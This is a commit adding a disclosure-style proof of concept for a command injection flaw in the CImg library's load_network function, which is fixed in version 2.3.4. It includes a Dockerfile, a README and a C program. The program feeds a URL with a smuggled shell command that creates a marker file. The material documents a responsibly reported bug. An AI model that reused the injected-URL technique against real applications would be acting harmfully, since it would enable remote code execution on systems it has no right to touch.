Exploit PoC for command injection vulnerability in CImg.

kevinbackhouse · kevinbackhouse · commit 56c28b2bcd8e · 2018-12-06T12:39:56.000Z
diff --git a/CImg/Dockerfile b/CImg/Dockerfile
@@ -0,0 +1,17 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y git gcc build-essential curl
+
+# Create user account for the attacker.
+RUN adduser semmle --disabled-password
+
+# Copy the exploit PoC into the user's home directory.
+COPY poc.c /home/semmle/poc.c
+RUN chown -R semmle:semmle /home/semmle/
+
+# Switch over to the 'semmle' user, since root access is no longer required
+USER semmle
+WORKDIR /home/semmle
+RUN git clone https://framagit.org/dtschump/CImg.git
+RUN cd CImg && git checkout 5bb8a03d7fed06275ddb53a56c567fb6f61aa4a4
diff --git a/CImg/README.md b/CImg/README.md
@@ -0,0 +1,23 @@
+# Command injection in CImg
+
+This is a proof of concept for a command injection vulnerability in the [CImg](http://cimg.eu/) library. The vulnerability was found by [Cristian-Alexandru Staicu](https://www.linkedin.com/in/crstaicu/), during his internship at Semmle in 2018. We reported the vulnerability to David Tschumperle, maintainer of CImg, on Jul 27, 2018. The vulnerability was fixed in version 2.3.4.
+
+The problem is that the `load_network` function does not do any sanitization on the url string. Internally, `load_network` calls `system`, which means that a specially crafted url can trigger code execution. Since CImg is a library, the severity of the issue depends greatly on how it is used. If anyone has written an application that calls `load_network` directly with a string that came from something like a HTTP request, then it would be a remote code execution vulnerability.
+
+To run the PoC, first build and run the docker image:
+
+```bash
+docker build . -t cimg
+docker run -i -t cimg
+```
+
+The Dockerfile clones the [CImg](https://framagit.org/dtschump/CImg.git) git repository and checks out the vulnerable version.
+
+Now, inside docker, compile and run the PoC as follows:
+
+```bash
+g++ -I./CImg poc.c -o poc
+./poc
+```
+
+Notice that the file `~/CImg-RCE` has now been created.
diff --git a/CImg/poc.c b/CImg/poc.c
@@ -0,0 +1,19 @@
+#undef cimg_display
+#define cimg_display 0
+#include "CImg.h"
+using namespace cimg_library;
+
+// To compile and run:
+//
+// g++ -I./CImg poc.c -o poc
+// ./poc
+//
+// Notice that the file ~/CImg-RCE has now been created.
+
+int main(int argc, char **argv) {
+  const char *str = "https://i.pinimg.com/originals/da/25/51/da2551d47b8ae00fa7beb583bff53236.jpg\" && touch ~/CImg-RCE && echo \"";
+  CImg<> img;
+  img.assign(str);
+
+  return 0;
+}
